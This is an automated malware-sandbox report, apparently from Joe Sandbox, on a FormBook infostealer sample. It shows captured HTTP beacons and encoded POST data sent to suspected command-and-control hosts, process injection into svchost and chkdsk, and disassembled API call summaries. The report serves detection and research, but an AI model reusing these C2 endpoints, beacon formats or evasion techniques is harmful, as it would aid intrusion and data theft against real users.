qNX+53duO7E0US2jq6W2SfKJrqAHCdLudCSM9iBk6xqSp0MWTWijCqRL6GWLsTtRfoH0AJCkOE1Kd90liJTpM3UmDOFntHYCfrmjwxgl1l1Iyy4pDxxKWE6ikZMCTQl14WA+Wn7eyQQHC/UIuWhujnetqJK34X7LmHNptLOE1ksVTLLqYILQx0ETOvc0YRyZHtsB0SsDPs3yzmt+dNRdx8G/mtnat9tY5cZdWHqvI+bd0O9gLt6KP5vFbLmKs154CstcKdoB5F6mZOQpOuVcXDrHPRhdsFf6gWrbMGN2DZY8 [TRUNCATED]
Jan 11, 2025 09:24:07.110616922 CET	1024	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:24:07 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ipfv1M5a%2Be6rgFS4E%2FxEjuyIvr0kI%2BDLRBC91Ug8g0AjtxKc1nwsbcwNMyltyAi94FBQwvYgUKB18hBq1dCpORcm7v%2BhHWmF%2FO1ME%2FGXQ9ouEMyg8eFxos%2FeGnmV40Z219TYpXDcMOn3gWM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90038232e84b4304-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2169&min_rtt=2169&rtt_var=1084&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1782&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo\|qF\|<0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.8	50009	104.21.38.192	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:24:09.004293919 CET	472	OUT	GET /jhf5/?3DkHhn=X47VSHjA7Ra6hBgR1eJb6pHvwL8UYAxuv5evRVNTAMu+fw462P/7SsFxa6WZOMbinD7w009mibInuncktbKjofctyMBEnZDK39OjLQRAxIrXDibUuqiVHbgJGblCqHQhVA==&jH4x=86JHl HTTP/1.1 Host: www.mycleanupfiesta.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Jan 11, 2025 09:24:09.626426935 CET	1007	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:24:09 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mBe58Vk5G9lE5%2FAcM%2FzrLhMtOFG8zH2bpqpCKLY5rtUYvn8uG9yljdWA5HzotZDmxv6ruKOAlDTfNc7exfOLAEXzk3F29yXzl5VgOnSVYG4Hz%2Bt4LRBqrML8ZYsGaGz1EpiGj2oswvWh8hk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90038242cdc443fb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1573&rtt_var=786&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=472&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.8	50010	85.159.66.93	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:24:22.910357952 CET	724	OUT	POST /vivr/ HTTP/1.1 Host: www.soainsaat.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.soainsaat.xyz Referer: http://www.soainsaat.xyz/vivr/ Connection: close Content-Length: 207 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 6d 6b 57 48 69 2f 2b 6f 6b 79 42 4b 56 47 42 77 47 44 6e 4f 45 4a 4c 79 45 4a 6b 34 72 6e 43 55 51 50 41 45 45 77 58 56 36 2b 36 6a 35 38 6f 5a 70 44 68 68 77 42 66 48 33 57 51 39 6e 7a 2b 32 50 6b 66 4c 4a 33 35 75 4b 6f 38 6e 39 32 68 64 61 63 34 6e 42 2b 34 6d 49 54 68 5a 72 42 47 4a 2f 56 50 75 42 79 71 65 34 66 41 61 6d 48 46 32 41 70 52 51 46 33 2b 64 4b 2f 76 7a 79 46 4f 30 43 45 39 33 73 50 77 53 68 41 34 41 6d 31 36 65 61 58 6f 53 61 5a 4c 72 30 65 6e 41 35 53 2b 70 58 55 77 75 66 53 79 4b 33 43 36 7a 64 61 41 39 62 2f 61 37 6a 57 70 78 34 55 4b 50 4b 7a 4e 63 4d 48 35 61 43 4a 45 3d Data Ascii: 3DkHhn=mkWHi/+okyBKVGBwGDnOEJLyEJk4rnCUQPAEEwXV6+6j58oZpDhhwBfH3WQ9nz+2PkfLJ35uKo8n92hdac4nB+4mIThZrBGJ/VPuByqe4fAamHF2ApRQF3+dK/vzyFO0CE93sPwShA4Am16eaXoSaZLr0enA5S+pXUwufSyK3C6zdaA9b/a7jWpx4UKPKzNcMH5aCJE=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.8	50011	85.159.66.93	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:24:25.463421106 CET	744	OUT	POST /vivr/ HTTP/1.1 Host: www.soainsaat.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.soainsaat.xyz Referer: http://www.soainsaat.xyz/vivr/ Connection: close Content-Length: 227 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 6d 6b 57 48 69 2f 2b 6f 6b 79 42 4b 54 6c 4a 77 41 67 50 4f 43 70 4c 7a 4f 70 6b 34 79 33 44 64 51 50 4d 45 45 78 44 38 36 4c 69 6a 34 59 73 5a 6f 43 68 68 7a 42 66 48 6a 6d 52 35 34 6a 2b 78 50 6b 44 70 4a 33 46 75 4b 6f 6f 6e 39 32 52 64 61 50 67 6d 42 75 34 6b 48 7a 68 48 6b 68 47 4a 2f 56 50 75 42 79 75 34 34 66 49 61 6c 32 31 32 42 4c 35 58 50 58 2b 61 64 50 76 7a 32 46 4f 77 43 45 39 42 73 4b 59 38 68 47 30 41 6d 31 4b 65 64 47 6f 56 50 70 4b 67 70 4f 6d 73 35 68 66 4d 62 46 38 30 53 7a 69 74 32 55 4b 56 56 4d 78 58 42 64 53 39 67 57 42 61 34 58 69 35 50 45 51 30 57 6b 70 71 63 65 53 66 72 55 7a 6a 52 48 31 59 69 77 75 57 63 55 2f 4d 71 35 55 66 Data Ascii: 3DkHhn=mkWHi/+okyBKTlJwAgPOCpLzOpk4y3DdQPMEExD86Lij4YsZoChhzBfHjmR54j+xPkDpJ3FuKoon92RdaPgmBu4kHzhHkhGJ/VPuByu44fIal212BL5XPX+adPvz2FOwCE9BsKY8hG0Am1KedGoVPpKgpOms5hfMbF80Szit2UKVVMxXBdS9gWBa4Xi5PEQ0WkpqceSfrUzjRH1YiwuWcU/Mq5Uf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.8	50012	85.159.66.93	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:24:28.009668112 CET	1761	OUT	POST /vivr/ HTTP/1.1 Host: www.soainsaat.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.soainsaat.xyz Referer: http://www.soainsaat.xyz/vivr/ Connection: close Content-Length: 1243 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 6d 6b 57 48 69 2f 2b 6f 6b 79 42 4b 54 6c 4a 77 41 67 50 4f 43 70 4c 7a 4f 70 6b 34 79 33 44 64 51 50 4d 45 45 78 44 38 36 4c 71 6a 35 74 34 5a 70 6c 64 68 79 42 66 48 67 6d 52 30 34 6a 2f 30 50 6b 62 74 4a 33 49 62 4b 72 51 6e 39 58 78 64 4e 4f 67 6d 4b 75 34 6b 4d 54 68 47 72 42 47 6d 2f 56 66 71 42 79 2b 34 34 66 49 61 6c 31 74 32 47 5a 52 58 4a 58 2b 64 4b 2f 76 6e 79 46 4f 49 43 45 31 2f 73 4b 63 43 68 57 55 41 6e 56 61 65 62 77 55 56 4e 4a 4b 69 36 2b 6d 30 35 68 54 66 62 46 68 4c 53 7a 57 58 32 54 2b 56 57 70 41 2f 5a 2b 4b 4b 79 77 70 4d 37 58 79 44 42 6c 77 52 4a 45 35 53 54 65 61 79 68 79 76 69 59 32 68 31 6e 77 48 64 48 67 4c 6d 6e 76 31 6b 51 36 55 61 4d 67 55 36 56 78 66 64 47 30 50 37 4b 57 6c 57 4e 71 5a 41 64 4a 50 4d 47 34 43 34 4c 79 6b 78 44 66 43 53 49 42 6e 2f 35 67 41 7a 69 6a 39 32 47 41 53 55 6d 54 64 33 70 75 45 30 6f 79 53 7a 55 72 6b 58 74 4d 35 35 4d 4f 41 52 51 78 44 53 44 44 7a 6a 72 7a 2b 4b 50 4f 6b 49 38 56 73 78 37 38 79 45 65 58 33 59 69 53 55 [TRUNCATED] Data Ascii: 3DkHhn=mkWHi/+okyBKTlJwAgPOCpLzOpk4y3DdQPMEExD86Lqj5t4ZpldhyBfHgmR04j/0PkbtJ3IbKrQn9XxdNOgmKu4kMThGrBGm/VfqBy+44fIal1t2GZRXJX+dK/vnyFOICE1/sKcChWUAnVaebwUVNJKi6+m05hTfbFhLSzWX2T+VWpA/Z+KKywpM7XyDBlwRJE5STeayhyviY2h1nwHdHgLmnv1kQ6UaMgU6VxfdG0P7KWlWNqZAdJPMG4C4LykxDfCSIBn/5gAzij92GASUmTd3puE0oySzUrkXtM55MOARQxDSDDzjrz+KPOkI8Vsx78yEeX3YiSUVbvKphHTplxwHUVLexnE2FnAjKr55zNobzp+/w0lxn2Mj7GpVZOyopgONh8yOjxUCboSeGlyJJ9j9pG5gBtZ57jCbfNZ/8Q0kqD/kDIeB9f5BdmDa7NxRxkLrbktAvIwY5+yTqHpSQP54Zp+xL0OVNVpZJT2/GfbaZ3fdrrp64PCs9Q5K2MfZWYDLJ1O8phDfR7iN1CkEbIqnfBnJNskp3r64nxIh2jEfGn7AANcg/VVm/0hfRgHcc76gmvjvocqgCOtENuhdw48ZkwwPAq+pFMlXo5k3FFHLfOj9P7xakus7WoJSNmSj/kV9a+XarI5uY//gRhgIHkFK26nQchHeb83VLZtaEjerMGIedziL1MedH1J3CsLgh05ch7FA96odjA+sdD/Aq4xefh94W7GiNpxP/kFMeABGOpS2Q4xipGOU0pVq2V6/WsOD4IXx+OmrE+9ul3RDZTvyLFXn+l0Fsf93RbxPOtvnICNnnBXydM9RMCcuGvJKMhg4pNl0N7JcRzQxxPXHvyEH4mjNjekHqKR+cqYlioqkKxFrjRVaTJLCM6bOTS8wTkjSEmH1Z8sj12Rd2TcEfPbiaRluVE+SNyzF9Qgt6Ta9DG8MPn3iNpHWRq5cxNKprevqM3ti8AAChT3+iwShRnz7ya6UP4sKfV1C51cteCcK+ [TRUNCATED]

Target ID:	0
Start time:	03:21:23
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\bIcqeSVPW6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\bIcqeSVPW6.exe"
Imagebase:	0xa10000
File size:	1'224'192 bytes
MD5 hash:	EEB8A8CD64ECC9E96B0C4CDE2072681C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:21:24
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\bIcqeSVPW6.exe"
Imagebase:	0x650000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1702544011.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1703561585.0000000004750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1703177843.0000000002D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:21:38
Start date:	11/01/2025
Path:	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe"
Imagebase:	0x8c0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3324169649.0000000006CC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3319443230.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	03:21:40
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\chkdsk.exe"
Imagebase:	0xb80000
File size:	23'040 bytes
MD5 hash:	B4016BEE9D8F3AD3D02DD21C3CAFB922
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3319370482.0000000005630000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3319323904.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3318079583.0000000005080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	03:22:06
Start date:	11/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6d20e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	1.3%
Signature Coverage:	6.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	73

Executed Functions

Function 00A3B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8020e215cfc1eb71f5d251c85e0965831421f73f46934f85b237c4fecbc5ff79
Instruction ID: 9e050eda871b7c17c76c98a0804f2b228c44a87ead0b361639859af8eca4b98f
Opcode Fuzzy Hash: 8020e215cfc1eb71f5d251c85e0965831421f73f46934f85b237c4fecbc5ff79
Instruction Fuzzy Hash: 37325C75B122288FCB24CF54DD81AE9B7B6FF46310F1841D9E50AA7A91D7309E81CF62

Function 00A13D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00A13AA3,?), ref: 00A13D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00A13AA3,?), ref: 00A13D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,00AD1148,00AD1130,?,?,?,?,00A13AA3,?), ref: 00A13DC8

Part of subcall function 00A16430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A13DEE,00AD1148,?,?,?,?,?,00A13AA3,?), ref: 00A16471

SetCurrentDirectoryW.KERNEL32(?,?,?,00A13AA3,?), ref: 00A13E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00AC28F4,00000010), ref: 00A81CCE
SetCurrentDirectoryW.KERNEL32(?,00AD1148,?,?,?,?,?,00A13AA3,?), ref: 00A81D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00AADAB4,00AD1148,?,?,?,?,?,00A13AA3,?), ref: 00A81D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00A13AA3), ref: 00A81D90

Part of subcall function 00A13E6E: GetSysColorBrush.USER32(0000000F), ref: 00A13E79
Part of subcall function 00A13E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00A13E88
Part of subcall function 00A13E6E: LoadIconW.USER32(00000063), ref: 00A13E9E
Part of subcall function 00A13E6E: LoadIconW.USER32(000000A4), ref: 00A13EB0
Part of subcall function 00A13E6E: LoadIconW.USER32(000000A2), ref: 00A13EC2
Part of subcall function 00A13E6E: RegisterClassExW.USER32(?), ref: 00A13F30

Part of subcall function 00A136B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A136E6
Part of subcall function 00A136B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A13707
Part of subcall function 00A136B8: ShowWindow.USER32(00000000,?,?,?,?,00A13AA3,?), ref: 00A1371B
Part of subcall function 00A136B8: ShowWindow.USER32(00000000,?,?,?,?,00A13AA3,?), ref: 00A13724

Part of subcall function 00A14FFC: _memset.LIBCMT ref: 00A15022
Part of subcall function 00A14FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A150CB

Strings

This is a third-party compiled AutoIt script., xrefs: 00A81CC8
runas, xrefs: 00A81D84

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-3287110873
Opcode ID: 6b27d9f581f81870de380beedd7bf2992c98de219d929081bd18311f40c2f819
Instruction ID: 8edde976df649d7c2c13e9458e10fd284a3bef7989e87ed5dece2cbe7336f034
Opcode Fuzzy Hash: 6b27d9f581f81870de380beedd7bf2992c98de219d929081bd18311f40c2f819
Instruction Fuzzy Hash: 2251F531E05245BECF11FBF0DE45EEE7BB9AB55740F00426AF512A6192DB704AC6CB21

Function 00A2DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00A2DDEC
GetCurrentProcess.KERNEL32(00000000,00AADC38,?,?), ref: 00A2DEAC
GetNativeSystemInfo.KERNELBASE(?,00AADC38,?,?), ref: 00A2DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 00A2DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 00A2DF1F
GetSystemInfo.KERNEL32(?,00AADC38,?,?), ref: 00A2DF29
GetSystemInfo.KERNEL32(?,00AADC38,?,?), ref: 00A2DF35

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: 5f0bd60a8c5a254c790c609a6e26dcc4cd5f187d82b21a9714ec7fd4a26025e0
Instruction ID: 9f740705dcd5078df113f8da8ca39f1668f19073874a94686ab5c4cc8e18d9fa
Opcode Fuzzy Hash: 5f0bd60a8c5a254c790c609a6e26dcc4cd5f187d82b21a9714ec7fd4a26025e0
Instruction Fuzzy Hash: 8961C4B180A394CFCF15DF68A9C11E97FB4AF29300B1989E9D8459F247C634C949CB69

Function 00A1406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00A1449E,?,?,00000000,00000001), ref: 00A1407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00A1449E,?,?,00000000,00000001), ref: 00A14092
LoadResource.KERNEL32(?,00000000,?,?,00A1449E,?,?,00000000,00000001,?,?,?,?,?,?,00A141FB), ref: 00A84F1A
SizeofResource.KERNEL32(?,00000000,?,?,00A1449E,?,?,00000000,00000001,?,?,?,?,?,?,00A141FB), ref: 00A84F2F
LockResource.KERNEL32(00A1449E,?,?,00A1449E,?,?,00000000,00000001,?,?,?,?,?,?,00A141FB,00000000), ref: 00A84F42

Strings

SCRIPT, xrefs: 00A14088

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 381a8345a1ad93e91812bc01b417cd33ea6c84eaa17019143df08aebeb0b4c42
Instruction ID: b693a3d05d16cb6677aa7f4c24da359500093a2df418355a87d747bf3eacd868
Opcode Fuzzy Hash: 381a8345a1ad93e91812bc01b417cd33ea6c84eaa17019143df08aebeb0b4c42
Instruction Fuzzy Hash: 09117070200701BFE7258B6ADC48FA77BB9EBC9B51F24412DF60286250DB71DC818A20

Function 00A56CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00A82F49), ref: 00A56CB9
FindFirstFileW.KERNELBASE(?,?), ref: 00A56CCA
FindClose.KERNEL32(00000000), ref: 00A56CDA

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
